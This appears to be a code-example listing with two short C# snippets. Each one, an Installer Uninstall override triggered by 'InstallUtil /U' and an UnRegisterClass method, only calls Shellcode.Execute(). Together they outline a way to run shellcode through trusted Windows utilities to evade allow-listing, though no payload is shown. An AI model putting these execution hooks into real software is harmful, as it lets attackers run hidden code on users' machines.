コード例 #1
0
 // This executes during InstallUtil /U invocation
 public override void Uninstall(System.Collections.IDictionary savedState)
 {
     Shellcode.Execute();
 }
コード例 #2
0
 public static void UnRegisterClass(string key)
 {
     Shellcode.Execute();
 }